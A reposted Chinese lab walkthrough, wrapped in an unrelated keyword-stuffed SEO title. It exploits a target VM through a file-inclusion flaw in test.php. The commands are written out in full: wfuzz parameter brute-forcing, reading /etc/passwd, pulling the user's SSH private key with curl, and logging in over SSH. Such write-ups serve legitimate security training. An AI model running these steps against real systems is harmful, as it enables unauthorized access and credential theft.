当前位置: 首页> 汽车> 新车 > 苏州园区网站开发_物流网站建设方案范文_seo网络优化_产品营销推广策略

苏州园区网站开发_物流网站建设方案范文_seo网络优化_产品营销推广策略

时间:2025/7/12 9:43:06来源:https://blog.csdn.net/ljh123321ljh/article/details/146568490 浏览次数: 0次
苏州园区网站开发_物流网站建设方案范文_seo网络优化_产品营销推广策略

1.在kali中扫描靶机ip

arp-scan-l

访问靶机

2.在kali中扫描靶机端口

22/tcp   open   ssh
80/tcp   open   http
111/tcp  closed rpcbind
139/tcp  open   netbios-ssn
443/tcp  open   https
445/tcp  open   microsoft-ds
3306/tcp open   mysql
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open   zeus-admin

3.我们尝试分析80端口信息

用户为qiu

4.扫描靶机的目录

dirsearch -u "http://192.168.124.159"

我们发现了一个test.php文件,有点像有问题的文件

5.访问一下

提示缺少get参数

说明我们在该页面可以传参

6.我们尝试爆破一下参数

wfuzz -u "http://192.168.124.159/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

爆破成功

7.我们使用file传参查看一下用户信息

http://192.168.124.159/test.php?file=/etc/passwd

看到了qiu用户

8.我们尝试查看qiu的ssh密钥

http://192.168.124.159/test.php?file=/home/qiu/.ssh/id_rsa

9.我们使用文件包含把qiu的ssh密钥下载到本地并查看

curl http://192.168.124.159/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa"

cat id_rsa

10.我们需要600的权限才能使用密钥文件

chmod 600 id_rsa
连接ssh

ssh -i id_rsa qiu@192.168.124.159

关键字:苏州园区网站开发_物流网站建设方案范文_seo网络优化_产品营销推广策略

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: